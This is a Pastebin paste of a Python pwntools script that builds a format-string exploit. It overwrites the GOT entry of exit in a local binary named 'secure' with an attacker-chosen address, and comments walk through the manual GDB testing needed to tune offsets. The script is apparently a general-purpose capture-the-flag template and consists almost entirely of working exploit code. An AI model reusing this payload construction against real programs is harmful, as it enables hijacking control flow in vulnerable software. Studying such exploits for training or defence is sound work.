RootOfTheNull

Format String/printf Vulnerability

Aug 14th, 2018
568
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2.  
  3. '''
  4. John Hammond
  5. FULL DISCLAIMER:
  6.  This aims to be a general purpose script... but you will need to modify it
  7.  as you work with exploring the problem you are on. There are a couple steps of
  8.  manual testing, and I try to explain these in the comments below.
  9. '''
  10.  
  11.  
  12. from pwn import *
  13.  
  14. context.log_level = 'critical'
  15.  
  16. elf = ELF('./secure')
  17.  
  18. # These are the addresses in memory that you want to overwrite. YOU WILL NEED TO CHANGE THESE
  19. # You can find these with pwntools (elf.got['<function_name>']) or `readelf -s <binary_name>`
  20. overwite = elf.got['exit'] # this is the value that you want to OVERWRITE...
  21. to_write = 0x08048713 # this is the value that you want TO OVERWRITE IT WITH...
  22.  
  23.  
  24.  
  25. # For initial testing, you will first need to discover MANUALLY..:
  26. ### This is the size of the buffer that you can write into. We use this for padding.
  27. # (You can find this with Hopper or IDA if you don't have source code given).
  28. length_of_buffer = 64
  29. ### This is the offset of our buffer on the stack. (the position of AAAA for testing)
  30. offset = 35
  31.  
  32. ### These values come from testing in GDB.... YOU WILL NEED TO DO THIS MANUALLY
  33. testing_value = 30  # use this when replacing
  34.  
  35. first_difference = 0x2e # this is the value you see replacing the GOT entry after FIRST test
  36.                         # (the LAST FOUR BYTES hex, the LOW BYTES)
  37. first_difference -= testing_value    # NO NEED TO CHANGE THIS LINE
  38. second_difference = 0x8731 # this is the value you see the SECOND time you test.
  39.                            # (the first FOUR BYTES, the HIGH BYTES
  40. second_difference -= testing_value # NO NEED TO CHANGE THIS LINE
  41.  
  42.  
  43. # --------------------------------------------------------------------------------------------
  44.  
  45. # These variables help do the math for you. DO NOT CHANGE THESE VARIABLES
  46. LOW_BYTES = str(hex(to_write)[-4:])
  47. LOW_BYTES_DIFFERENCE = int(LOW_BYTES,16) - first_difference
  48. HIGH_BYTES = '1'+hex(to_write)[2:-4].zfill(4)
  49. HIGH_BYTES_DIFFERENCE = int(HIGH_BYTES, 16) - second_difference
  50.  
  51. # Convenience function for padding, no need to change
  52. def pad(s): return s + "X" * ( length_of_buffer - len(s) )
  53.  
  54.  
  55. #### You will have to tweak this to test in GDB.
  56. exploit = ""
  57. exploit += p32(overwite)                   # this will be filled with the LOW BYTES DIFFERENCE...
  58. exploit += p32(overwite+1)                 # this fills HIGH BYTES (+1 for next pos. on stack)...
  59. exploit += 'AAAABBBB'                      #
  60. # exploit += '$<#change_to_test_offset>$x' ### USED FOR TESTING OFFSET... NOT NEEDED FOR PAYLOAD
  61.  
  62. # exploit += '%'+str(offset)+'$'+str(testing_value)+'x'         ### USED FOR FIRST TEST...
  63.                                                                 ### (COMMENT OUT THE 2ND TEST BELOW!!)
  64. exploit += '%'+str(offset)+'$'+str(LOW_BYTES_DIFFERENCE)+'x'    # use this line for payload
  65.                                                                 # when variable above are filled
  66. exploit += '%'+str(offset)+'$n' # used to write the value!
  67.  
  68. # exploit += '%'+str(offset+1)+'$'+str(testing_value)+'x'       ### USED FOR SECOND TEST...
  69.                                                                 ### (KEEP THE FIRST TEST ABOVE)
  70. exploit += '%'+str(offset+1)+'$'+str(HIGH_BYTES_DIFFERENCE)+'x'
  71.                                                                 # when variable above are filled
  72. exploit += '%'+str(offset+1)+'$n' # used to write the value!
  73.  
  74.  
  75. print exploit
RAW Paste Data